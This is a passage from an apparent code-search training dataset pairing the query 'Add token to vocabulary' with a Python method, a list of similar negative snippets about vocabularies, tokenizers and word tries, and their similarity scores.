Vocabulary()\n\tvocab.add_word('<pad>')\n\tvocab.add_word('<start>')\n\tvocab.add_word('<end>')\n\tvocab.add_word('<unk>')\n\n\t# Adds the words to the vocabulary.\n\tfor i, word in enumerate(words):\n\t\tvocab.add_word(word)\n\treturn vocab" ]
[ "0.67872804", "0.660514", "0.6490391", "0.6246055", "0.6192233", "0.61789507", "0.6158393", "0.613217", "0.61019224", "0.60960674", "0.606695", "0.6037764", "0.6025569", "0.59994584", "0.59994584", "0.5967367", "0.5922967", "0.59061986", "0.58743894", "0.58231103", "0.5815941", "0.5815354", "0.5810426", "0.5759699", "0.57592255", "0.57481694", "0.57349885", "0.5726076", "0.5724806", "0.57091016", "0.56836206", "0.56727535", "0.56656533", "0.5655575", "0.56373805", "0.5620854", "0.5611739", "0.55690795", "0.5556263", "0.5551625", "0.5535476", "0.54586774", "0.54565084", "0.545555", "0.5444492", "0.5444163", "0.5442156", "0.5433655", "0.5396574", "0.5395586", "0.539448", "0.53885674", "0.5363615", "0.53581876", "0.53578436", "0.5346128", "0.53391033", "0.53354496", "0.5316495", "0.5288133", "0.52873045", "0.52710426", "0.526976", "0.526976", "0.5266856", "0.5258536", "0.5245212", "0.52396846", "0.52382874", "0.5226467", "0.5209122", "0.5209122", "0.5209122", "0.5208433", "0.5208367", "0.520046", "0.5182154", "0.5168196", "0.51552653", "0.51517135", "0.51512915", "0.51256377", "0.51094", "0.51088154", "0.51039046", "0.50928116", "0.5091421", "0.50912714", "0.5081315", "0.50798154", "0.50686955", "0.50644106", "0.50572306", "0.5044631", "0.5041498", "0.50410867", "0.50322527", "0.5031752", "0.5024196", "0.5024069", "0.5002711" ]
0.0
-1
Add token to vocabulary.
def add_token(self, token): token = self.process_token(token) self._token_count.update([token])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_token(self,token):\n\t\tif not token:\n\t\t\tlogging.error(\"Token cannot be empty!\")\n\t\t\texit()\n\n\t\tself.tokens.append(token.lower())\n\t\t#self.user_defined_token = token.lower()", "def add_embedding(self, token, embedding):\n self.word2idx[token] = self.vocab_size\n self.vocab_size += 1\n\n self.embedding = np.vstack((self.embedding, embedding))", "def add_vocab_word(self, word):\n # If it's a special token, it'll be separatelly processed during saving file. Skip here.\n if word in special_tokens:\n return\n # Check each character in the word. We don't want none-character (control code) in the vocaburary.\n for char in word:\n if cu.is_none_char(char):\n return\n # If it's a new word, store it.\n if (not word in self.words_ext) and (not word in self.words_new):\n self.words_new.append(word)", "def AddToken(self, token, merge=False):\n token.SetLangId(self.id_)\n if not merge:\n self.tokens_.append(token)\n else:\n exists = self.MatchToken(token)\n if exists is None:\n self.tokens_.append(token)\n else:\n exists.IncrementCount(token.Count())", "def __setitem__(self, word):\n raise ValueError(\"Vocabulary is only readable, if you want to set new k-v pair, use vocab.add()\")", "def add_doc_to_vocab(filename, vocab):\n doc = load_doc(filename)\n tokens = clean_doc(doc)\n vocab.update(tokens)", "def add_doc_to_vocab(filename, vocab):\n doc = load_doc(filename)\n tokens = clean_doc(doc)\n vocab.update(tokens)", "def add(self, tokens):\n\n for token in tokens:\n self.vocab.add(token)\n\n for leader, token in generate_ngrams(tokens, self.size, include_terminator = self.size != 1):\n if leader not in self.frequencies:\n self.frequencies[leader] = Frequency()\n\n self.frequencies[leader].add(token)", "def add_token(\r\n self,\r\n ind: int,\r\n w: str,\r\n ) -> AddToken:\r\n self.t = self.t + 1\r\n content = self._encrypt_update(self.t, Op.ADD, ind, w)\r\n return self.sigma.add_token(content, w)", "def add_word(self, word, freq=None):\n pass", "def addToken(self, token: Token, offset: int):\n self.__tokens.append(token)\n self.__tokenMap[token] = offset", "def addKeyWord(self, kWord):\n #kWord.printKeyWord()\n self.sentence.append(kWord)", "def add(self, document):\n #words=[word.lower() for word in words if word.isalpha()] #added on 0415\n for token in [t.lower() for t in nltk.word_tokenize(document)]:\n if not token.isalpha():\n continue\n\n if token in self.stopwords:\n continue\n \n if self.stemmer:\n token = self.stemmer.stem(token)\n \n if self.__unique_id not in self.index[token]:\n self.index[token].append(self.__unique_id)\n \n self.documents[self.__unique_id] = document\n self.__unique_id += 1", "def _add_word(self, word):\n if not word in self._word2idx.keys():\n self._word2idx[word] = self.vocab_size\n self.freqs[word] = 0\n self._idx2word[self.vocab_size] = word\n self.vocab_size += 1\n self.freqs[word] += 1", "def register_vocab(self, start_concept, end_concept, alias_of, regex_str):\n self.register_vocabulary(start_concept, end_concept,\n alias_of, regex_str)", "def add_word_tag(self, token, label):\n # Add total count for label\n self.label_counts[label] += 1\n # Add count for word given label\n if token not in self.words_labels_counts[label]:\n self.words_labels_counts[label][token] = 1\n else:\n self.words_labels_counts[label][token] += 1", "def addToken(self, tokenType, value):\r\n\t\tself.tokens.append( Token(tokenType, value) )", "def add_word(self):\n word = self.word # easier to call word now\n\n wordlist_path = self.get_wordlist_path()\n with open(wordlist_path) as f:\n data = json.load(f)\n\n if exists_already(data,word):\n exit()\n\n next_index = int(data[\"cur_index\"]) + 1 # new index\n data[\"words\"][next_index] = word # update wordlist\n data[\"words\"] = dict(sorted(data[\"words\"].items(), key=lambda item: item[1])) # alphabetisize\n data[\"cur_index\"] = next_index # update index\n\n with open(wordlist_path, 'w') as f:\n json.dump(data, f, indent = 4)\n\n print(f\"[{word}] added to [{self.pos}]. This is the [{next_index}] indexed word added.\")", "def add(self, token_docid):\n token = token_docid[0]\n doc_id = token_docid[1]\n # collapse identical tokens together\n if token in self.posting:\n self.posting[token].append(doc_id)\n else:\n self.posting[token] = [doc_id]", "def add(self, token):\n self.rpc.call(MsfRpcMethod.AuthTokenAdd, [token])", "def add_to_dict(self, tokens):\n# TODO: ?add normalization of a token?\n for token in tokens:\n if self.embedding_words and (token not in self.embedding_words):\n continue\n self.freq[token] += 1\n if token not in self.tok2ind:\n index = len(self.tok2ind)\n self.tok2ind[token] = index\n self.ind2tok[index] = token", "def add_word(self, word, vector=None, low=-2., high=2.):\n if word not in self.w2v_idx:\n self.w2v_idx[word] = len(self.w2v_idx)\n if vector is None:\n vector = np.random.uniform(low=low, high=high, size=(self.w2v_dim,))\n self.w2v_out.append(np.asarray(vector, dtype=np.float32))\n else:\n print(\"word %s already in this word2vec\" % word)", "def add_vocab_words(self, words):\n for word in words:\n word = word.strip()\n if word:\n self.add_vocab_word(word)", "def update_vocab(self, word):\n \n if (word not in self.vocab and\n word in self.model.vocab and \n word not in [x.name for x in self.field]):\n \n self.vocab[word] = Vocab(index=self.vocab_size)\n self.vocab_size += 1", "def _add_non_empty_token(self, token: str):\n if token != \"\":\n self._tokens.append(token)", "def addWord(self, word):\n if word:\n self.word_dict[len(word)].append(word)", "def _insert_vocab(self, json_obj, mode=InsertVocabMode.ALL):\n raise NotImplementedError", "def push_token(self, tok):\n self.tokens.appendleft(tok)", "def add(self, word):\r\n if not word or word.strip() == '':\r\n return\r\n self.words.append(word)", "def visit(self, token: tokenize.TokenInfo) -> None:\n self._lines[token.start[0]].append(token)", "def visit(self, token: tokenize.TokenInfo) -> None:\n self._lines[token.start[0]].append(token)", "def add_word(self, word, data=None):\n self.__word = word\n self.__data = data", "def token(self, token):\n\n self._token = token", "def token(self, token):\n\n self._token = token", "def next_word(self):\n self.append = self.add_new_word", "def add_word(self, word):\n word = word.lower()\n if word in self.word_list:\n self.word_list[word] += 1\n else:\n self.word_list[word] = 1", "def add_word(self, word):\n if word not in self.word2index:\n self.word2index[word] = self.n_words\n self.word2count[word] = 1\n self.index2word[self.n_words] = word\n self.n_words += 1\n else:\n self.word2count[word] += 1", "def add_word(self, word):\n if word not in self.word2index:\n self.word2index[word] = self.n_words\n self.word2count[word] = 1\n self.index2word[self.n_words] = word\n self.n_words += 1\n else:\n self.word2count[word] += 1", "def add_token(self, symbol): # type: (Union[BuiltinTypeSymbol, VarSymbol])-> None\n\n self._symbols[symbol.name] = symbol", "def add(self, word: str) -> None:\n self.d.add(word)", "def index_word(self, token):\n if token not in self.word_2_idx:\n idx = len(self.word_2_idx)\n self.word_2_idx[token] = idx\n self.idx_2_word[idx] = token", "def put_vector(self, term, vector):\n self.terms.append(term)\n self.vectors.append(vector.vector)\n self.real_vectors.append(vector)\n return self.dict.update({term: vector})", "def add_word(self, word):\r\n word = word.strip().lower()\r\n if word in self.builtin_words:\r\n return\r\n if word not in self.word_count:\r\n self.word_count[word] = 1\r\n else:\r\n self.word_count[word] += 1", "def add(self, word: str) -> None:\n self.d.add(word)\n self.d.add(word.lower())\n self.save_user_dict()", "def add_special_tokens_(model, tokenizer):\n orig_num_tokens = len(tokenizer.encoder)\n num_added_tokens = tokenizer.add_special_tokens(ATTR_TO_SPECIAL_TOKEN) # doesn't add if they are already there\n if num_added_tokens > 0:\n model.resize_token_embeddings(new_num_tokens=orig_num_tokens + num_added_tokens)", "def addWord(self, word: str) -> None:\n self.dict[len(word)].append(word)", "def setVocabulary(self, vocabulary): # real signature unknown; restored from __doc__\n pass", "def add_token(self, amount):\n self.M += amount", "def add(self, word: str) -> None:\n self.words.add(word)\n self.added_words.add(word)", "def update_from_vocabulary(self, vocab_path):\n with open(vocab_path, 'r') as vocab_file:\n for word in vocab_file:\n word = word.strip()\n self._add_new_word(word)", "def addWord(self, word):\n current_node = self\n for idx, letter in enumerate(word):\n if letter not in current_node.kids:\n current_node.kids[letter] = WordDictionary()\n current_node.kids[letter].val = letter\n current_node = current_node.kids[letter]\n if idx == len(word) - 1:\n current_node.isWord = True", "def add_word(self, word):\n\n if word in self.wordlist:\n return \"Already in word list\"\n\n file_name = self.config_folder + self.wordlist_file\n word_list = open(file_name,'a+')\n word_list.write(word + \"\\n\")\n word_list.close()\n return None", "def add_word(self, word):\n word = self.map_word(word)\n super(InvariantLanguage, self).add_word(word)", "def addWord(self, word: str) -> None:\n self.trie.insert(word)", "def _add_token(self, token_type: TokenType, literal: Any = None):\n text = self.source[self.start : self.current]\n\n self.tokens.append(\n Token(token_type=token_type, lexeme=text, literal=literal, line=self.line)\n )", "def add_unknown_token(self):\n self.load_all()\n sample_idxs = np.random.randint(0, self.embedding.shape[0],\n self.config.embedding_sample_size)\n unknown_vector = np.mean(self.embedding[sample_idxs, :], axis=0)\n\n self.add_embedding(self.config.unknown_token, unknown_vector)\n self.write_all()", "def addWord(self, word: str) -> None:\n tmp = self.root\n for i, letter in enumerate(word):\n if letter not in tmp.seq:\n tmp.seq[letter] = Node()\n \n tmp = tmp.seq[letter]\n \n tmp.value = word", "def token_vector(self, token):\n unit_id = self.svecs.vocab.unit2id(token.text)\n return self.svecs.emb[unit_id]", "def addWord(self, word):\n lenw = len(word)\n if not lenw in self.bag:\n self.bag[lenw] = []\n self.bag[lenw].append(word)", "def add_word_to_trigram(new_word):\n # Trigrams require 2 previous words\n # If we don't have those yet, then set them\n if len(prev_words) < 2:\n prev_words.append(new_word)\n return\n\n # If it exists, add the word to the list\n # If it doesn't exist, create it\n word_tuple = (prev_words[0], prev_words[1])\n if word_tuple in trigrams:\n trigrams[word_tuple].append(new_word)\n else:\n trigrams[word_tuple] = [new_word]\n\n # Increment the prev words\n prev_words.pop(0)\n prev_words.append(new_word)", "def add(self, event: Event = None) -> None:\n if self.loaded:\n w = self.currentWord\n if w:\n self.spellController.add(w)\n self.tab.onFindButton()", "def token(self, value):\r\n self._token = value", "def add_sentence(self, sentence):\n cleaned = self.clean_string(sentence)\n stemmed = self.stem(cleaned)\n self.texts.append(stemmed)", "def addWord(self, word):\n selected_node = self.root\n for i in word:\n if selected_node.next.get(i) is None:\n new_node = WordDictionary.Node()\n selected_node.next[i] = new_node\n selected_node = new_node\n else:\n selected_node = selected_node.next[i]\n if not selected_node.isFinish:\n selected_node.isFinish = True\n self.size += 1", "def add(self, key, idx=None, count=1):\n key = self.lower_(key)\n if idx is not None:\n self.index2word[idx] = key\n self.word2index[key] = idx\n else:\n if key not in self.word2index:\n idx = len(self.word2index)\n self.index2word[idx] = key\n self.word2index[key] = idx\n\n if key not in self.word_count:\n self.word_count[key] = count\n else:\n self.word_count[key] += count", "def add_word(self, request):\n if Word.query(Word.word == request.word).get():\n raise endpoints.ConflictException('That word is in the list!')\n else:\n word_list = []\n temp = request.word.upper()\n for i in temp:\n if i == \" \" or i < 'A' or i > 'Z':\n raise endpoints.BadRequestException(\n 'Please Enter One Word!')\n else:\n word_list.append(i)\n w = Word(word=request.word, word_list=word_list)\n w.put()\n return StringMessage(message='Added %s to the list!' % request.word)", "def add(self, term, count=1):\n term = term.lower() if self.lower else term\n if term in self.term2id:\n idx = self.term2id[term]\n else:\n idx = len(self.id2term)\n self.id2term[idx] = term\n self.term2id[term] = idx\n if count > 0:\n if term in self.term_frequent:\n self.term_frequent[term] += count\n else:\n self.term_frequent[term] = count\n return idx", "def add_tokens(self, tokens):\n self.result.extend([d for d in tokens])", "def __iadd__(self, other):\n if isinstance(other, Token):\n new = Token(self.text + other.text, self.position, self.category)\n else:\n new = Token(self.text + other, self.position, self.category)\n return new", "def add_tokens(self, sample):\n # Text\n inputs = self._tokenizer.encode_plus(sample['text'],\n add_special_tokens=True,\n max_length=self._max_text_length,\n padding='max_length', # TODO padding here or in model (together with item_glove)?\n truncation=True, # truncate to 512 (added for MSNBC dataset)\n return_attention_mask=True)\n # TODO warn if text was truncated\n #if len(TODO) > self._max_text_length:\n # self._logger.info(f'Truncate long input sentence ({len(TODO)} tokens) to {self._max_text_length}')\n sample['text_tokenized'] = inputs['input_ids']\n sample['text_attention_mask'] = inputs['attention_mask']\n # Item name (mention/surface form)\n inputs = self._tokenizer.encode(sample['item_name'],\n add_special_tokens=False)\n sample['item_name_tokenized'] = inputs", "def add_language_model(self,lm):\n self.lm = lm\n try:\n self.vocab = get_vocab_from_ngram(lm.get_model())\n except:\n raise", "def addWord(self, word): \n\n # make trie for new word\n self.root.makeTrie(word)", "def add_word(self, pair, next_pair = None):\n if pair not in self:\n self.types += 1\n if next_pair:\n self[pair] = Dictogram([next_pair])\n elif next_pair:\n self[pair].add_count(next_pair)\n self.tokens += 1", "def _add_new_word(self, word):\n if word not in self.word_to_id:\n word_id = len(self.word_to_id)\n self.word_to_id[word] = word_id\n self.id_to_word[word_id] = word", "def add_vecs_to_vocab(vocab, vectors):\n length = len(vectors[0][1])\n vocab.reset_vectors(width=length)\n for word, vec in vectors:\n vocab.set_vector(word, vector=vec)\n return vocab", "def token_to_alias(raw_text, vocab):\n pass", "def add(self, term, count=1):\n term = term.lower() if self.lower else term\n if term in self.term2id:\n idx = self.term2id[term]\n else:\n idx = len(self.id2term)\n self.id2term[idx] = term\n self.term2id[term] = idx\n if count > 0:\n if term in self.term_frequent:\n self.term_frequent[term] += count\n else:\n self.term_frequent[term] = count\n\n if term not in self.initial_terms:\n for char in term:\n if char not in self.char2id.keys():\n idc = len(self.id2char)\n self.id2char[idc] = char\n self.char2id[char] = idc\n return idx", "def add(self, term):\n self._value = self.accum_param.addInPlace(self._value, term)", "def register_vocabulary(self, entity_value, entity_type,\n alias_of, regex_str):\n with self.lock:\n if regex_str:\n self.engine.register_regex_entity(regex_str)\n else:\n self.engine.register_entity(\n entity_value, entity_type, alias_of=alias_of)", "def addWord(self, word):\n trie = self.trie\n for c in word:\n if c in trie.children:\n trie = trie.children[c]\n else:\n new_trie_node = TrieNode()\n trie.children[c] = new_trie_node\n trie = new_trie_node\n\n trie.is_term = True", "def addWord(self, word):\n cur = self.__root\n for c in word:\n if c not in cur.next:\n cur.next[c] = Node()\n cur = cur.next[c]\n\n if not cur.isWord:\n cur.isWord = True", "def create_vocabulary_single_token(\n data: Series,\n num_most_frequent: Optional[int] = None,\n processor: DataFrameEngine = PANDAS,\n unknown_symbol: str = UNKNOWN_SYMBOL,\n):\n processed_counts = data.str.strip().value_counts(sort=True)\n processed_counts = processor.compute(processed_counts)\n full_vocab = processed_counts.index.tolist()\n # Only add unknown symbol if num most frequent tokens is less than total number of unique tokens\n if num_most_frequent < len(full_vocab):\n vocab = [unknown_symbol] + full_vocab[:num_most_frequent]\n else:\n vocab = full_vocab\n str2idx = {unit: i for i, unit in enumerate(vocab)}\n str2freq = processed_counts.to_dict()\n str2freq = {k: str2freq.get(k, 0) for k in vocab}\n return vocab, str2idx, str2freq", "def _look_up(self, token):\n if self.args.add_vn:\n return tf.nn.embedding_lookup(self.embedding_matrix + \\\n tf.random.normal(tf.shape(self.embedding_matrix), stddev=0.075), token)\n\n return tf.nn.embedding_lookup(self.embedding_matrix, token)", "def add_special_tokens_(model, tokenizer, update_model=True):\n orig_num_tokens = len(tokenizer)\n num_added_tokens = tokenizer.add_special_tokens(ATTR_TO_SPECIAL_TOKEN) # doesn't add if they are already there\n #print(\"coab::\",len(tokenizer.vocab))\n if (num_added_tokens > 0 and update_model):\n model.encoder.resize_token_embeddings(new_num_tokens=orig_num_tokens + num_added_tokens)\n model.decoder.resize_token_embeddings(new_num_tokens=orig_num_tokens + num_added_tokens)\n #print(model.encoder.embeddings.word_embeddings.weight.shape)\n #print(model.decoder.bert.embeddings.word_embeddings.weight.shape)", "def write_vocab(vocab, filename):\n print(\"Writing vocab...\")\n with open(filename, \"w\", encoding='utf-8') as f:\n for i, word in enumerate(vocab):\n if i != len(vocab) - 1:\n f.write(\"{}\\n\".format(word))\n else:\n f.write(word)\n print(\"- done. {} tokens\".format(len(vocab)))", "def addtoken(name, unsafe_import_token):\n stm = shared_morphene_instance()\n if mph.rpc is not None:\n mph.rpc.rpcconnect()\n if not unlock_wallet(stm):\n return\n if not unsafe_import_token:\n unsafe_import_token = click.prompt(\"Enter private token\", confirmation_prompt=False, hide_input=True)\n mph.wallet.addToken(name, unsafe_import_token)\n set_shared_morphene_instance(stm)", "def update_vocab(self, text):\n for char in text:\n if char not in self.vocab:\n self.vocab[char] = len(self.vocab)\n if char not in self.char2count:\n self.char2count[char] = 0\n self.char2count[char] += 1\n return", "def __add__(self, other):\n if isinstance(other, Token):\n return Token(self.text + other.text, self.position, self.category)\n else:\n return Token(self.text + other, self.position, self.category)", "def add_word(self, _set, document, label, word):\n \n if _set not in self.sets:\n self.sets[_set] = {}\n\n if document not in self.sets[_set]:\n self.sets[_set][document] = {}\n self.sets[_set][document]['label'] = label\n self.sets[_set][document]['words'] = set()\n self.sets[_set][document]['number_of_words'] = 0\n self.total_number_of_documents += 1\n self.sets[_set][document]['number_of_words'] += 1\n self.sets[_set][document]['words'].add(word)\n\n if word not in self.dictionary:\n self.dictionary[word] = {}\n self.dictionary[word]['id'] = len(self.dictionary)-1\n self.dictionary[word]['docs'] = {}\n\n if document not in self.dictionary[word]['docs']:\n self.dictionary[word]['docs'][document] = 1\n else:\n self.dictionary[word]['docs'][document] += 1", "def addWord(self, word):\n node = self.root\n for ch in word:\n node = node.children[ch]\n node.isWord = True", "def add_keyword(self, new_word):\n\n self.keywords.append(new_word)\n words = Keywords()\n words.add(new_word)\n mongo.db.users.update({\"name\": self.username},\n {\"$set\": {\"keywords\": self.keywords}})", "def add_word_and_label_id(self, word, label_id):\n self.words.append(word)\n self.label_ids.append(label_id)", "def add_words(self, words):\r\n for word in words:\r\n self.add(word)", "async def wordfilter_add(self, ctx, *, phrase):\n phrase = phrase.lower()\n await self.bot.redis.rpush('wordfilter', phrase)\n self.words.append(phrase)\n await ctx.send(f'Added `{phrase}` to the filtered words')", "def addWord(self, word):\n node = self\n for c in word:\n node = node[c]\n node.go += 1", "def createToken(self,type,value):\n newToken = Token(type, value)\n self.tokensTable.append(newToken)", "def add_word_to_dictionary(self, word: str):\n self.trie.add_word(word)", "def addWord(self, word: str) -> None:\n if str(len(word)) in self.elements:\n self.elements[str(len(word))].add(word)\n else:\n self.elements[str(len(word))] = {word}", "def add(self, sentence):\n self._sentences.add(sentence)" ]
[ "0.7474371", "0.7235822", "0.6903988", "0.6526929", "0.65188766", "0.6505907", "0.6505907", "0.64998305", "0.6496983", "0.6493279", "0.64262176", "0.6420701", "0.6391367", "0.6325264", "0.63200015", "0.62549394", "0.62311953", "0.622333", "0.6177798", "0.61690384", "0.61336285", "0.61031127", "0.6096867", "0.60905343", "0.60826486", "0.6082443", "0.6053392", "0.60310906", "0.6017655", "0.5985635", "0.5985635", "0.59685165", "0.5918892", "0.5918892", "0.5906536", "0.5901874", "0.5886092", "0.5886092", "0.5881147", "0.58716494", "0.58709234", "0.5863565", "0.582057", "0.5819288", "0.58116066", "0.5798947", "0.5776732", "0.5759984", "0.575981", "0.5750529", "0.57484907", "0.57032067", "0.5700063", "0.5692102", "0.5655651", "0.56532747", "0.5646247", "0.562467", "0.5617013", "0.5584298", "0.5558455", "0.5558237", "0.5553753", "0.5548334", "0.5530405", "0.55226505", "0.55153143", "0.55141014", "0.54802996", "0.5479846", "0.54763407", "0.54537123", "0.5442956", "0.5442045", "0.5441605", "0.5440332", "0.54367423", "0.54364043", "0.542796", "0.5426528", "0.5426118", "0.54260564", "0.54036283", "0.5402926", "0.5395004", "0.5394236", "0.5393136", "0.53918856", "0.53917354", "0.538835", "0.5378691", "0.53780437", "0.53669053", "0.5356126", "0.53551996", "0.53549474", "0.53537476", "0.53488505", "0.5342317" ]
0.68879795
4
Update dictionary from a collection of documents. Each document is a list of tokens.
def add_documents(self, docs): if 'sentences' in docs: for sent in docs.sentences: sent = map(self.process_token, [t for t in sent.tokens if not t.is_stopword]) self._token_count.update(sent) else: sent = list(map(self.process_token, [t for t in docs.tokens if not t.is_stopword])) self._token_count.update(sent)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_documents(self, docs):\n for sent in docs:\n sent = map(self.process_token, sent)\n self._token_count.update(sent)", "def add_document_lists(self, docs):\n for sent in docs:\n sent = map(self.process_token, sent)\n self._token_count.update(sent)", "def add_to_dict(self, tokens):\n# TODO: ?add normalization of a token?\n for token in tokens:\n if self.embedding_words and (token not in self.embedding_words):\n continue\n self.freq[token] += 1\n if token not in self.tok2ind:\n index = len(self.tok2ind)\n self.tok2ind[token] = index\n self.ind2tok[index] = token", "def update(tokens):\n global TOKENS\n\n for token_id in tokens:\n\n if token_id not in TOKENS:\n TOKENS[token_id] = {}\n\n if isinstance(tokens, dict):\n token_info = tokens[token_id]\n if token_info is None:\n token_info = {}\n\n alias = token_info.get(\"alias\")\n if alias is not None:\n TOKENS[token_id][\"alias\"] = alias\n\n decimals = token_info.get(\"decimals\")\n if decimals is not None:\n TOKENS[token_id][\"decimals\"] = decimals", "def intern_documents(documents: Dict[str, List[List[str]]], word_interner: Dict[str, int], unk_token: str):\n ret = dict()\n unk = word_interner[unk_token]\n for docid, sentences in documents.items():\n ret[docid] = [[word_interner.get(w, unk) for w in s] for s in sentences]\n return ret", "def update_existing(doc_data_tples):\n def per_doc(doc, data_tples):\n def per_field(data_tple):\n field, datas = data_tple\n map(_do_append_field(doc, field), datas)\n map(per_field, data_tples)\n return doc\n\n __docs = ( (per_doc(doc, data_tples), data_tples) for doc,data_tples in doc_data_tples )\n return __docs", "def updateDocumentAll(self, documents):\n docs = []\n for document in documents:\n if isinstance(document, couch.Document):\n document = document.getData()\n\n # these are required params\n if \"_id\" not in document or \"_rev\" not in document:\n raise Exception(\"Both _id & _rev fields are required!\")\n\n docs.append(document)\n\n return self.client.post(self.name +\"/_bulk_docs\", None,\n {\"docs\": docs}).getBodyData()", "def update_from_document(self, document_path):\n with open(document_path, 'r') as document_file:\n for sentence in document_file:\n words = sentence.strip().split()\n for word in words:\n self._add_new_word(word)", "def preprocess(self, documents):\n\n # A dict storing the frequency of each word\n word_freq = {}\n\n # Iterate for each document\n for doc in documents:\n # Split the document into a list of words and iterate on it\n for w in extract_words(doc):\n # Update word frequencies\n '''YOUR CODE HERE'''\n if w not in word_freq.keys():\n word_freq[w] = 1\n else:\n word_freq[w] += 1\n\n ''' END CODE FOR THIS LOOP '''\n\n\n # A set of words with frequency less than 'self.min_freq'\n remove_words = set()\n\n # Check frequency of each word and add to 'remove_words'\n # if it's frequency is below self.min_freq\n\n ''' YOUR CODE HERE '''\n for w in word_freq.keys():\n if word_freq[w] < self.min_freq:\n remove_words.add(w)\n\n # Delete the words in 'remove_words' from 'word_freq'\n for w in remove_words:\n del word_freq[w]\n\n # Fill 'self.word_to_idx' and 'self.idx_to_word' for\n # each word in 'word_freq' (dicts are explained above)\n\n i = 0\n for w in word_freq.keys():\n self.word_to_idx[w] = i\n self.idx_to_word[i] = w \n i += 1\n\n ''' END YOUR CODE HERE '''", "def fit(self, documents):\n # Get a list of all the unique tokens that appear\n vocab = list({\n token for doc in documents\n for token in self.tokenizer(doc)\n if token not in self._word2index\n })\n\n # This is UNK, START, END, and PAD.\n nb_special_tokens = 4\n\n # First, we map token -> ID, leaving the first slots for special tokens\n self._word2index.update({\n word: idx\n for idx, word in enumerate(vocab, nb_special_tokens)\n })\n\n # Next, we invert this map, which we can do since it was built from\n # unique vocabulary elements and is by definition bijective.\n self._index2word.update({\n idx: word\n for word, idx in self._word2index.items()\n })\n\n return self", "def multiple_document_processing(self) -> List:\n batch_list = []\n for doc, idx in self.__documents:\n entities_idx = {'idx': idx}\n entities_result = self.create_entity(document=doc)\n word_cleaned = self.clean_words(doc)\n entities_idx[self.key_spacy_text] = str(word_cleaned)\n entities_idx.update(entities_result)\n batch_list.append(entities_idx)\n return batch_list", "def get_doc_dicts(self, doc_ids):\n pass", "def updateMultipleDocuments(cred, payload):\n\n url = cred.base_url + \"documents:commit\"\n data = { 'writes': [] }\n\n for path, fieldData in payload.iteritems():\n pathData = createFirestoreDataObject(cred, path, fieldData)\n data['writes'].append(pathData)\n \n makeRequest(cred, url, 'POST', data)", "def add_doc_in_posting_list(word_posting_list, docs):\n for doc_score in docs:\n if doc_score[\"doc\"] in word_posting_list.keys():\n word_posting_list[doc_score[\"doc\"]] = int(doc_score[\"score\"]) + int(word_posting_list[doc_score[\"doc\"]])\n else:\n word_posting_list[doc_score[\"doc\"]] = doc_score[\"score\"]", "def load(self, documents, uniquify=False):\n assert documents, \"missing list of documents, text single doc per line\"\n assert isinstance(documents, list), \"documents must be list\"\n assert isinstance(documents[0], list), \"each document is also a list\"\n #--------------------------------------------------------------------------------------------\n\n def _get_new_counts(document):\n return Counter(document) if not uniquify else Counter(list(set(document)))\n\n for idx, document in enumerate(documents):\n new_counter = _get_new_counts(document)\n self.counter.update(new_counter)\n if idx % 1000 == 0:\n print(\"load: {}\\r\".format(idx), end='')\n return self", "def parse_doc(self, doc_as_list):\n\n tweet_id = doc_as_list[0]\n tweet_date = doc_as_list[1]\n full_text = doc_as_list[2]\n url = doc_as_list[3]\n indice = doc_as_list[4]\n retweet_text = doc_as_list[5]\n retweet_url = doc_as_list[6]\n retweet_indice = doc_as_list[7]\n quote_text = doc_as_list[8]\n quote_url = doc_as_list[9]\n quoted_indice = doc_as_list[10]\n retweet_quoted_text = doc_as_list[11]\n retweet_quoted_url = doc_as_list[12]\n retweet_quoted_indice = doc_as_list[13]\n\n term_dict = {}\n\n tokenized_text = self.parse_sentence(full_text)\n tokenized_quote = self.parse_sentence(quote_text)\n # tokenized_url = self.handle_url(url)\n\n\n doc_length = len(tokenized_text) # after text operations - length of full_text\n\n new_tokenized_text = tokenized_text + tokenized_quote\n\n # spell checker\n # new_tokenized_text = self.spell.update(new_tokenized_text)\n\n for term in new_tokenized_text:\n if term is not \"\": # or (term.isalpha() and len(term) == 1)\n if term not in term_dict:\n term_dict[term] = 1\n else:\n term_dict[term] += 1\n\n document = Document(tweet_id, tweet_date, full_text, url, retweet_text, retweet_url, quote_text,\n quote_url, term_dict, doc_length)\n return document", "def prepare_dictionary_from_docs(self):\n if os.path.exists(self.DICT_PATH):\n return True\n self.logger.info(\"START PREPARING DICT\")\n for fn in os.listdir(self.wiki_path):\n self.logger.info(\"dict update {0}\".format(fn))\n content = self.get_processed_content(fn)\n self.dictionary.add_documents([content])\n self.dictionary.filter_extremes(no_below=20, no_above=0.1, keep_n=100000)\n self.dictionary.compactify()\n self.dictionary.save(self.DICT_PATH)\n return True", "def get_dict(cleaned_docs):\n data = []\n for doc in cleaned_docs:\n data += doc\n return list(set(data))", "def transform(self, docs):\n return [doc for doc in docs]", "def doc2bow(self, document, allow_update=False, return_missing=False):\n\n doc=[t.text for t in document.tokens]\n\n if isinstance(doc, string_types):\n raise TypeError(\"doc2bow expects an array of unicode tokens on input, not a single string\")\n\n # Construct (word, frequency) mapping.\n counter = defaultdict(int)\n for w in doc:\n counter[w if isinstance(w, str) else str(w, 'utf-8')] += 1\n\n token2id = self.token2id\n if allow_update or return_missing:\n missing = sorted(x for x in iteritems(counter) if x[0] not in token2id)\n if allow_update:\n for w, _ in missing:\n # new id = number of ids made so far;\n # NOTE this assumes there are no gaps in the id sequence!\n token2id[w] = len(token2id)\n result = {token2id[w]: freq for w, freq in iteritems(counter) if w in token2id}\n\n if allow_update:\n self.num_docs += 1\n self.num_pos += sum(itervalues(counter))\n self.num_nnz += len(result)\n # keep track of document and collection frequencies\n for tokenid, freq in iteritems(result):\n self.cfs[tokenid] = self.cfs.get(tokenid, 0) + freq\n self.dfs[tokenid] = self.dfs.get(tokenid, 0) + 1\n\n # return tokenids, in ascending id order\n result = sorted(iteritems(result))\n if return_missing:\n return result, dict(missing)\n else:\n return result", "def _build_token_dict(self, corpus: List[List[str]]):\n self.token2idx = self.load_from_vocab_file(self.vocab_path)\n self.idx2token = dict([(value, key)\n for key, value in self.token2idx.items()])\n logging.debug(f\"build token2idx dict finished, contains {len(self.token2idx)} tokens.\")\n self.dataset_info['token_count'] = len(self.token2idx)", "def docs2ids(self):\n self.docs = [ [self.vocab[word] for word in doc] for doc in self.docs]", "def update_all(cls, documents: List[dict]) -> (List[dict], List[dict]):\n if not documents:\n raise ValidationFailed([], message=\"No data provided.\")\n\n if not isinstance(documents, list):\n raise 